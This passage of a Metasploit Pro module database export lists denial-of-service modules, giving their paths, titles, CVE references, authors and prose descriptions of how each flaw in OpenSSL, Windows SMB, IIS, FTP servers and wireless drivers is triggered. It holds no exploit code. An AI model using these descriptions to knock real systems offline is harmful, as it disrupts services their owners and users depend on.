hdm " 1245,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb","auxiliary","dos/ssl/dtls_changecipherspec","auxiliary/dos/ssl/dtls_changecipherspec","OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS",300,"This module performs a Denial of Service Attack against Datagram TLS in OpenSSL version 0.9.8i and earlier. OpenSSL crashes under these versions when it recieves a ChangeCipherspec Datagram before a ClientHello.","Metasploit Framework License (BSD)","f","2000-04-26 00:00:00",,,"aggressive","t","CVE-2009-1386, OSVDB-55073","Jon Oberheide , theLightCosine " 1246,"2013-05-13 21:30:07","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/ssl/openssl_aesni.rb","auxiliary","dos/ssl/openssl_aesni","auxiliary/dos/ssl/openssl_aesni","OpenSSL TLS 1.1 and 1.2 AES-NI DoS",300,"The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the length of an encrypted message when used with a TLS version 1.1 or above. This leads to an integer underflow which can cause a DoS. The vulnerable function aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL. This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default OpenSSL 1.0.1c package.","Metasploit Framework License (BSD)","f","2013-02-05 00:00:00",,,"aggressive","t","CVE-2012-2686, URL-https://www.openssl.org/news/secadv_20130205.txt","Wolfgang Ettlinger " 1247,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb","auxiliary","dos/syslog/rsyslog_long_tag","auxiliary/dos/syslog/rsyslog_long_tag","rsyslog Long Tag Off-By-Two DoS",300,"This module triggers an off-by-two overflow in the rsyslog daemon. This flaw is unlikely to yield code execution but is effective at shutting down a remote log daemon. This bug was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5. Compiler differences may prevent this bug from causing any noticeable result on many systems (RHEL6 is affected).","Metasploit Framework License (BSD)","f","2011-09-01 00:00:00",,,"aggressive","t","CVE-2011-3200, URL-http://www.rsyslog.com/potential-dos-with-malformed-tag/, URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644","hdm " 1248,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/tcp/junos_tcp_opt.rb","auxiliary","dos/tcp/junos_tcp_opt","auxiliary/dos/tcp/junos_tcp_opt","Juniper JunOS Malformed TCP Option",0,"This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-37670, OSVDB-61538, URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/","todb " 1249,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/tcp/synflood.rb","auxiliary","dos/tcp/synflood","auxiliary/dos/tcp/synflood","TCP SYN Flooder",300,"A simple TCP SYN flooder","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1250,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb","auxiliary","dos/wifi/apple_orinoco_probe_response","auxiliary/dos/wifi/apple_orinoco_probe_response","Apple Airport 802.11 Probe Response Kernel Memory Corruption",300,"The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received that does not contain valid information element (IE) fields after the fixed-length header. The data following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-5710, OSVDB-30180","hdm " 1251,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/cts_rts_flood.rb","auxiliary","dos/wifi/cts_rts_flood","auxiliary/dos/wifi/cts_rts_flood","Wireless CTS/RTS Flooder",300,"This module sends 802.11 CTS/RTS requests to a specific wireless peer, using the specified source address,","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Brad Antoniewicz" 1252,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/deauth.rb","auxiliary","dos/wifi/deauth","auxiliary/dos/wifi/deauth","Wireless DEAUTH Flooder",300,"This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Brad Antoniewicz" 1253,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/fakeap.rb","auxiliary","dos/wifi/fakeap","auxiliary/dos/wifi/fakeap","Wireless Fake Access Point Beacon Flood",300,"This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , kris katterjohn " 1254,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/file2air.rb","auxiliary","dos/wifi/file2air","auxiliary/dos/wifi/file2air","Wireless Frame (File) Injector",300,"Inspired by Josh Wright's file2air, this module writes wireless frames from a binary file to the air, allowing you to substitute some addresses before it gets sent. Unlike the original file2air (currently v1.1), this module *does* take into account the ToDS and FromDS flags in the frame when replacing any specified addresses.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1255,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb","auxiliary","dos/wifi/netgear_ma521_rates","auxiliary/dos/wifi/netgear_ma521_rates","NetGear MA521 Wireless Driver Long Rates Overflow",300,"This module exploits a buffer overflow in the NetGear MA521 wireless device driver under Windows XP. When a specific malformed frame (beacon or probe response) is received by the wireless interface under active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. The vulnerability is triggered by an invalid supported rates information element. This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a NetGear MA521 Cardbus adapter. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-6059, OSVDB-30507, URL-ftp://downloads.netgear.com/files/ma521_1_2.zip, URL-http://projects.info-pull.com/mokb/MOKB-18-11-2006.html","Laurent Butti <0x9090@gmail.com>" 1256,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/netgear_wg311pci.rb","auxiliary","dos/wifi/netgear_wg311pci","auxiliary/dos/wifi/netgear_wg311pci","NetGear WG311v1 Wireless Driver Long SSID Overflow",300,"This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when malformed probe response frame is received that contains a long SSID field This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-6125, OSVDB-30511, URL-ftp://downloads.netgear.com/files/wg311_1_3.zip, URL-http://projects.info-pull.com/mokb/MOKB-22-11-2006.html","Laurent Butti <0x9090@gmail.com>" 1257,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb","auxiliary","dos/wifi/probe_resp_null_ssid","auxiliary/dos/wifi/probe_resp_null_ssid","Multiple Wireless Vendor NULL SSID Probe Response",300,"This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. This flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://802.11ninja.net/papers/firmware_attack.pdf, WVE-2006-0064","hdm " 1258,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/ssidlist_beacon.rb","auxiliary","dos/wifi/ssidlist_beacon","auxiliary/dos/wifi/ssidlist_beacon","Wireless Beacon SSID Emulator",300,"This module sends out beacon frames using SSID's identified in a specified file and randomly selected BSSID's. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID in from this script. For a list of common SSID's to use with this script, check http://www.wigle.net/gps/gps/main/ssidstats. If a file of SSID's is not specified, a default list of 20 SSID's will be used. This script will run indefinitely until interrupted.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , joswr1ght" 1259,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/wifun.rb","auxiliary","dos/wifi/wifun","auxiliary/dos/wifi/wifun","Wireless Test Module",300,"This module is a test of the wireless packet injection system. Please see external/ruby-lorcon/README for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1260,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/appian/appian_bpm.rb","auxiliary","dos/windows/appian/appian_bpm","auxiliary/dos/windows/appian/appian_bpm","Appian Enterprise Business Suite 5.6 SP1 DoS",300,"This module exploits a denial of service flaw in the Appian Enterprise Business Suite service.","BSD License","f","2007-12-17 00:00:00",,,"aggressive","t","CVE-2007-6509, OSVDB-39500, URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html","guiness.stout " 1261,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb","auxiliary","dos/windows/browser/ms09_065_eot_integer","auxiliary/dos/windows/browser/ms09_065_eot_integer","Microsoft Windows EOT Font Table Directory Integer Overflow",300,"This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer.","Metasploit Framework License (BSD)","f","2009-11-10 00:00:00",,,"aggressive","t","CVE-2009-2514, MSB-MS09-065, OSVDB-59869","hdm " 1262,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb","auxiliary","dos/windows/ftp/filezilla_admin_user","auxiliary/dos/windows/ftp/filezilla_admin_user","FileZilla FTP Server Admin Interface Denial of Service",300,"This module triggers a Denial of Service condition in the FileZilla FTP Server Administration Interface in versions 0.9.4d and earlier. By sending a procession of excessively long USER commands to the FTP Server, the Administration Interface (FileZilla Server Interface.exe) when running, will overwrite the stack with our string and generate an exception. The FileZilla FTP Server itself will continue functioning.","Metasploit Framework License (BSD)","f","2005-11-07 00:00:00",,,"aggressive","t","BID-15346, CVE-2005-3589, EDB-1336, OSVDB-20817","patrick " 1263,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb","auxiliary","dos/windows/ftp/filezilla_server_port","auxiliary/dos/windows/ftp/filezilla_server_port","FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service",300,"This module triggers a Denial of Service condition in the FileZilla FTP Server versions 0.9.21 and earlier. By sending a malformed PORT command then LIST command, the server attempts to write to a NULL pointer.","Metasploit Framework License (BSD)","f","2006-12-11 00:00:00",,,"aggressive","t","BID-21542, BID-21549, CVE-2006-6565, EDB-2914, OSVDB-34435","patrick " 1264,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb","auxiliary","dos/windows/ftp/guildftp_cwdlist","auxiliary/dos/windows/ftp/guildftp_cwdlist","Guild FTPd 0.999.8.11/0.999.14 Heap Corruption",300,"Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST.","Metasploit Framework License (BSD)","f","2008-10-12 00:00:00",,,"aggressive","t","CVE-2008-4572, EDB-6738, OSVDB-49045","kris katterjohn " 1265,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb","auxiliary","dos/windows/ftp/iis75_ftpd_iac_bof","auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof","Microsoft IIS FTP Server Encoded Response Overflow Trigger",300,"This module triggers a heap overflow when processing a specially crafted FTP request containing Telnet IAC (0xff) bytes. When constructing the response, the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes. This issue can be triggered pre-auth and may in fact be explotiable for remote code execution.","Metasploit Framework License (BSD)","f","2010-12-21 00:00:00",,,"aggressive","t","BID-45542, CVE-2010-3972, EDB-15803, MSB-MS11-004, OSVDB-70167, URL-http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx","Matthew Bergin, jduck " 1266,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb","auxiliary","dos/windows/ftp/iis_list_exhaustion","auxiliary/dos/windows/ftp/iis_list_exhaustion","Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion",300,"This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the ""FTP Publishing"" must be configured as ""manual"" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.","Metasploit Framework License (BSD)","f","2009-09-03 00:00:00",,,"aggressive","t","BID-36273, CVE-2009-2521, MSB-MS09-053, OSVDB-57753, URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html, URL-https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx","Kingcope, Myo Soe" 1267,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/solarftp_user.rb","auxiliary","dos/windows/ftp/solarftp_user","auxiliary/dos/windows/ftp/solarftp_user","Solar FTP Server <= 2.1.1 Malformed (User) Denial of Service",300,"This module will send a format string as USER to Solar FTP, causing a READ violation in function ""__output_1()"" found in ""sfsservice.exe"" while trying to calculate the length of the string.","Metasploit Framework License (BSD)","f","2011-02-22 00:00:00",,,"aggressive","t","EDB-16204","C4SS!0 G0M3S , sinn3r , x000 <3d3n@hotmail.com.br>" 1268,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/titan626_site.rb","auxiliary","dos/windows/ftp/titan626_site","auxiliary/dos/windows/ftp/titan626_site","Titan FTP Server 6.26.630 SITE WHO DoS",300,"The Titan FTP server v6.26 build 630 can be DoS'd by issuing ""SITE WHO"". You need a valid login so you can send this command.","Metasploit Framework License (BSD)","f","2008-10-14 00:00:00",,,"aggressive","t","CVE-2008-6082, EDB-6753, OSVDB-49177","kris katterjohn " 1269,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb","auxiliary","dos/windows/ftp/vicftps50_list","auxiliary/dos/windows/ftp/vicftps50_list","Victory FTP Server 5.0 LIST DoS",300,"The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command","Metasploit Framework License (BSD)","f","2008-10-24 00:00:00",,,"aggressive","t","CVE-2008-2031, CVE-2008-6829, EDB-6834, OSVDB-44608","kris katterjohn " 1270,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb","auxiliary","dos/windows/ftp/winftp230_nlst","auxiliary/dos/windows/ftp/winftp230_nlst","WinFTP 2.3.0 NLST Denial of Service",300,"This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST.","Metasploit Framework License (BSD)","f","2008-09-26 00:00:00",,,"aggressive","t","CVE-2008-5666, EDB-6581, OSVDB-49043","kris katterjohn " 1271,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb","auxiliary","dos/windows/ftp/xmeasy560_nlst","auxiliary/dos/windows/ftp/xmeasy560_nlst","XM Easy Personal FTP Server 5.6.0 NLST DoS",300,"This module is a port of shinnai's script. You need a valid login, but even anonymous can do it as long as it has permission to call NLST.","Metasploit Framework License (BSD)","f","2008-10-13 00:00:00",,,"aggressive","t","CVE-2008-5626, EDB-6741, OSVDB-50837","kris katterjohn " 1272,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb","auxiliary","dos/windows/ftp/xmeasy570_nlst","auxiliary/dos/windows/ftp/xmeasy570_nlst","XM Easy Personal FTP Server 5.7.0 NLST DoS",300,"You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST.","Metasploit Framework License (BSD)","f","2009-03-27 00:00:00",,,"aggressive","t","CVE-2008-5626, EDB-8294, OSVDB-50837","kris katterjohn " 1273,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/games/kaillera.rb","auxiliary","dos/windows/games/kaillera","auxiliary/dos/windows/games/kaillera","Kaillera 0.86 Server Denial of Service",300,"The Kaillera 0.86 server can be shut down by sending any malformed packet after the intial ""hello"" packet.","Metasploit Framework License (BSD)","f","2011-07-02 00:00:00",,,"aggressive","t","URL-http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html","Sil3nt_Dre4m" 1274,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb","auxiliary","dos/windows/http/ms10_065_ii6_asp_dos","auxiliary/dos/windows/http/ms10_065_ii6_asp_dos","Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service",300,"The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a Post Form value.","Metasploit Framework License (BSD)","f","2010-09-14 00:00:00",,,"aggressive","t","CVE-2010-1899, EDB-15167, MSB-MS10-065, OSVDB-67978","Alligator Security Team, Heyder Andrade , Leandro Oliveira " 1275,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/http/pi3web_isapi.rb","auxiliary","dos/windows/http/pi3web_isapi","auxiliary/dos/windows/http/pi3web_isapi","Pi3Web <=2.0.13 ISAPI DoS",300,"The Pi3Web HTTP server crashes when a request is made for an invalid DLL file in /isapi. By default, the non-DLLs in this directory after installation are users.txt, install.daf and readme.daf.","Metasploit Framework License (BSD)","f","2008-11-13 00:00:00",,,"aggressive","t","CVE-2008-6938, EDB-7109, OSVDB-49998","kris katterjohn " 1276,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb","auxiliary","dos/windows/llmnr/ms11_030_dnsapi","auxiliary/dos/windows/llmnr/ms11_030_dnsapi","Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS",300,"This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll as distributed with Windows Vista and later without KB2509553. By sending a specially crafted LLMNR query, containing a leading '.' character, an attacker can trigger stack exhaustion or potentially cause stack memory corruption. Although this vulnerability may lead to code execution, it has not been proven to be possible at the time of this writing. NOTE: In some circumstances, a '.' may be found before the top of the stack is reached. In these cases, this module may not be able to cause a crash.","Metasploit Framework License (BSD)","f","2011-04-12 00:00:00",,,"aggressive","t","CVE-2011-0657, MSB-MS11-030, OSVDB-71780","jduck " 1277,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/nat/nat_helper.rb","auxiliary","dos/windows/nat/nat_helper","auxiliary/dos/windows/nat/nat_helper","Microsoft Windows NAT Helper Denial of Service",300,"This module exploits a denial of service vulnerability within the Internet Connection Sharing service in Windows XP.","Metasploit Framework License (BSD)","f","2006-10-26 00:00:00",,,"aggressive","t","BID-20804, CVE-2006-5614, OSVDB-30096","MC " 1278,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb","auxiliary","dos/windows/rdp/ms12_020_maxchannelids","auxiliary/dos/windows/rdp/ms12_020_maxchannelids","MS12-020 Microsoft Remote Desktop Use-After-Free DoS",300,"This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.","Metasploit Framework License (BSD)","f","2012-03-16 00:00:00",,,"aggressive","t","CVE-2012-0002, EDB-18606, MSB-MS12-020, URL-http://pastie.org/private/4egcqt9nucxnsiksudy5dw, URL-http://pastie.org/private/feg8du0e9kfagng4rrg, URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html, URL-http://www.privatepaste.com/ffe875e04a, URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update","#ms12-020, Alex Ionescu, Daniel Godas-Lopez, Luigi Auriemma, jduck " 1279,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb","auxiliary","dos/windows/smb/ms05_047_pnp","auxiliary/dos/windows/smb/ms05_047_pnp","Microsoft Plug and Play Service Registry Overflow",300,"This module triggers a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, this module will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can be placed at 0x00000030, 0x0030005C, or 0x005C005C.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-15065, CVE-2005-2120, MSB-MS05-047, OSVDB-18830","hdm " 1280,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb","auxiliary","dos/windows/smb/ms06_035_mailslot","auxiliary/dos/windows/smb/ms06_035_mailslot","Microsoft SRV.SYS Mailslot Write Corruption",300,"This module triggers a kernel pool corruption bug in SRV.SYS. Each call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in a slow corruption of the kernel memory pool. These two bytes are almost always set to ""\xff\xff"" (a short integer with value of -1).","Metasploit Framework License (BSD)","f","2006-07-11 00:00:00",,"Attack","aggressive","t","BID-19215, CVE-2006-3942, MSB-MS06-035, OSVDB-27644, URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10","hdm " 1281,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb","auxiliary","dos/windows/smb/ms06_063_trans","auxiliary/dos/windows/smb/ms06_063_trans","Microsoft SRV.SYS Pipe Transaction No Null",300,"This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-19215, CVE-2006-3942, MSB-MS06-063, OSVDB-27644","hdm " 1282,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms09_001_write.rb","auxiliary","dos/windows/smb/ms09_001_write","auxiliary/dos/windows/smb/ms09_001_write","Microsoft SRV.SYS WriteAndX Invalid DataOffset",300,"This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. This module has been tested successfully against Windows Vista.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-31179, CVE-2008-4114, MSB-MS09-001, OSVDB-48153","j.v.vallejo " 1283,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb","auxiliary","dos/windows/smb/ms09_050_smb2_negotiate_pidhigh","auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh","Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",300,"This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-36299, CVE-2009-3103, MSB-MS09-050, OSVDB-57799, URL-http://seclists.org/fulldisclosure/2009/Sep/0039.html, URL-http://www.microsoft.com/technet/security/advisory/975497.mspx","Laurent Gaffie , hdm " 1284,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb","auxiliary","dos/windows/smb/ms09_050_smb2_session_logoff","auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff","Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference",300,"This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2009-3103, MSB-MS09-050, OSVDB-57799","sf " 1285,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb","auxiliary","dos/windows/smb/ms10_006_negotiate_response_loop","auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop","Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop",300,"This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerabile client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0017, MSB-MS10-006, OSVDB-62244, URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html","Laurent Gaffie , hdm " 1286,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb","auxiliary","dos/windows/smb/ms10_054_queryfs_pool_overflow","auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow","Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS",300,"This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows prior to the August 2010 Patch Tuesday. To trigger this bug, you must be able to access a share with at least read privileges. That generally means you will need authentication. However, if a system has a guest accessible share, you can trigger it without any authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-2550, MSB-MS10-054, OSVDB-66974, URL-http://seclists.org/fulldisclosure/2010/Aug/122","Laurent Gaffie , jduck " 1287,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb","auxiliary","dos/windows/smb/ms11_019_electbowser","auxiliary/dos/windows/smb/ms11_019_electbowser","Microsoft Windows Browser Pool DoS",0,"This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows Server 2003 that have been configured as a domain controller. By sending a specially crafted election request, an attacker can cause a pool overflow. The vulnerability appears to be due to an error handling a length value while calculating the amount of memory to copy to a buffer. When there are zero bytes left in the buffer, the length value is improperly decremented and an integer underflow occurs. The resulting value is used in several calculations and is then passed as the length value to an inline memcpy operation. Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and causes considerable damage to kernel heap memory. While theoretically possible, it does not appear to be trivial to turn this vulnerability into remote (or even local) code execution.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-46360, CVE-2011-0654, EDB-16166, MSB-MS11-019, OSVDB-70881, URL-http://seclists.org/fulldisclosure/2011/Feb/285","Cupidon-3005, jduck " 1288,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb","auxiliary","dos/windows/smb/rras_vls_null_deref","auxiliary/dos/windows/smb/rras_vls_null_deref","Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference",300,"This module triggers a NULL dereference in svchost.exe on all current versions of Windows that run the RRAS service. This service is only accessible without authentication on Windows XP SP1 (using the SRVSVC pipe).","Metasploit Framework License (BSD)","f","2006-06-14 00:00:00",,"Attack","aggressive","t","OSVDB-64340","hdm " 1289,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb","auxiliary","dos/windows/smb/vista_negotiate_stop","auxiliary/dos/windows/smb/vista_negotiate_stop","Microsoft Vista SP0 SMB Negotiate Protocol DoS",300,"This module exploits a flaw in Windows Vista that allows a remote unauthenticated attacker to disable the SMB service. This vulnerability was silently fixed in Microsoft Vista Service Pack 1.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-64341","hdm " 1290,"2013-05-07 